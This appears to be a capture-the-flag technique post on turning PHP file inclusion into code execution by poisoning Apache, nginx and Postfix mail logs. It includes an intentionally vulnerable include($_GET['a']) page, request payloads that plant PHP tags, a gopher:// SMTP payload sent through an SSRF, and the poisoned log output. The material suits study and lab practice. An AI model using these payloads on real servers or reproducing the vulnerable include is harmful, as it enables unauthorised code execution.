
LFI2RCE

Preface

Some file-inclusion challenges require getting a shell, not just reading files. This post collects the log-poisoning routes I have used so far; more will be added as I learn them.

Apache log poisoning

You need to be able to read the Apache log through the include (on Debian/Ubuntu's apache2 package that is /var/log/apache2/access.log).

apache2

Even though the request carrying the PHP tag gets a 400 error, it is still written to access.log:


Include the log to get a shell.

Send the poisoning request with Burp or Postman, otherwise it will be URL-encoded: a browser turns `<?php ...?>` into `%3C%3Fphp...`, which lands in the log encoded and is never executed.

nginx log poisoning

References:

https://www.ifobnn.com/lfiwithnginxlog.html

http://yulige.top/?p=346

### Environment setup

index.php (deliberately vulnerable: the include target is taken straight from the `a` query parameter):

```php
<?php
include($_GET['a']);
?>
<!--include($_GET['a']);-->
```

On Ubuntu 16.04 the /var/log/nginx directory has to be set to mode 645 and error.log to at least 644, so that the PHP worker (www-data) can traverse the directory and read the file; with the stock permissions the include cannot open the log.

Writing the payload

Send the request with Burp; a browser would URL-encode it. nginx does not encode the query-string key, so the raw `<?php ...?>` ends up in the request line that is logged to error.log.

Written successfully.


The log file now contains (one entry; the `request:` field holds the raw request line with the PHP tag):

```
root@9056889a4768:/var/log/nginx# cat error.log 
2019/11/07 07:32:07 [error] 9486#9486: *4 FastCGI sent in stderr: "PHP message: PHP Notice: Undefined index: a in /var/www/html/index.php on line 2
PHP message: PHP Warning: include(): Filename cannot be empty in /var/www/html/index.php on line 2
PHP message: PHP Warning: include(): Failed opening '' for inclusion (include_path='.:/usr/share/php') in /var/www/html/index.php on line 2" while reading response header from upstream, client: 112.96.102.200, server: _, request: "GET /?<?php phpinfo();?> HTTP/1.1", upstream: "fastcgi://unix:/run/php/php7.0-fpm.sock:", host: "39.108.36.103:7777"
```

When testing locally, the log can be cleared with:

```sh
root@9056889a4768:/var/log/nginx# rm error.log 
root@9056889a4768:/var/log/nginx# touch error.log
root@9056889a4768:/var/log/nginx# service nginx restart
```

After replacing the log file you must restart (or reload) nginx, otherwise nothing gets written: nginx keeps its file descriptor to the old, deleted inode and keeps writing there, while the fresh error.log stays empty. Truncating in place (`: > error.log`) or running `nginx -s reopen` avoids the restart.

SMTP log poisoning (needs an SSRF to reach port 25)

From a challenge in the June 2019 安恒杯 (Anheng Cup).

I couldn't get it to work locally on Ubuntu 18.04; not sure why.

The challenge author's Docker image:

registry.cn-hangzhou.aliyuncs.com/bypass/postfix

If that is gone, use tinmin/gophersmtp instead.

```sh
docker pull registry.cn-hangzhou.aliyuncs.com/bypass/postfix
```

Build the payload with Gopherus. The generated gopher:// URL is one SMTP conversation with each line percent-encoded and joined by `%0A`; the PHP tag goes into the RCPT address, which Postfix rejects but logs verbatim:

Payload:

```
gopher://127.0.0.1:25/_MAIL%20FROM:%3Ctinmin%40tinmin.cn%3E%0ARCPT%20To:%3C%3Fphp%20phpinfo%28%29%3B%3F%3E%0ADATA%0AFrom:%3Ctinmin%40tinmin.cn%3E%0ASubject:test%0AMessage:test%0A.
```

Send it through the SSRF with curl.

Success!

The mail log is poisoned as follows; including /var/log/mail.log through the LFI then executes the tag. (The angle-bracketed strings, including the `<?php phpinfo();?>` in the RCPT line, were stripped when the page was rendered; they are present in the actual file.)

```
root@853c144383cb:/var/www/html# cat /var/log/mail.log
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: connect from localhost[127.0.0.1]
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: improper command pipelining after MAIL from localhost[127.0.0.1]: RCPT To:\nDATA\nFrom:tinmin@tinmin.cn\nSubject:test\nMessage:test\n.\r\n
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: warning: Illegal address syntax from localhost[127.0.0.1] in RCPT command:
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: warning: non-SMTP command from localhost[127.0.0.1]: From:tinmin@tinmin.cn
Nov 7 12:16:40 853c144383cb postfix/smtpd[127]: disconnect from localhost[127.0.0.1]
```